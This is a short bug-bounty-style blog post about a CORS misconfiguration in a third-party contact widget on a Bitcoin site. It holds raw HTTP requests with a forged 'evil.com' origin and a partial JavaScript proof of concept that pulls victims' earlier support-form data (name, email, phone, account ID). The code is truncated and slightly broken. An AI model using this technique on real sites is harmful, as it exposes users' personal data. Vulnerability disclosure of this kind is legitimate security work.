Exploiting Misconfigured CORS on popular BTC Site

Severity: Medium

Complexity : Easy

Weakness : Allowing ACAH

On one of the popular BTC site , I was facing some issue with account so i used the’r support form to inform them .

Thing’s i Provided By form :

  1. Email .
  2. Phone Number.
  3. Name.
  4. Message.

Clicked on Submit and Noticed that Form is being sent to third party site .

POST /api/contact/widget/281d02/ HTTP/1.1
Host: api.thirdparty.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


  • After Sending form i changed the request Method to GET ,
  • Added Origin: evil.com in Request Header

GET /api/contact/widget/281d02/ HTTP/1.1
Origin: evil.com

  • Response :

Access-Control-Allow-Origin: evil.com
Access-Control-Allow-Credentials: true


  • Surprised to see Access-Control-Allow-Credentials: true
<body onload=’load()’>
<p id=”demo”></p>Name: <h3 id=”name”></h3>
Email : <h3 id=”email”></h3>
Phone : <h3 id=”phone”></h3>
ACCID :<h3 id=”AccountID”></h3>
<h3 id=”que”></h3>
function load(){
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function(){
if(this.readyState == 4 && this.status == 200){
//document.getElementById(‘demo’).innerHTML = JSON.stringify(this.responseText);
parsed = JSON.parse(this.responseText);
var arr = [];
for(var x in parsed){
document.getElementById(‘email’).innerHTML = arr[6];
document.getElementById(‘name’).innerHTML = arr[3];
document.getElementById(‘phone’).innerHTML = arr[7];
document.getElementById(‘AccountID’).innerHTML = arr[9];
  • As Soon as victim(user who used the’r support form at anytime or any previous date) visit’s malicious page . His previous form data get’s extracted .

Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store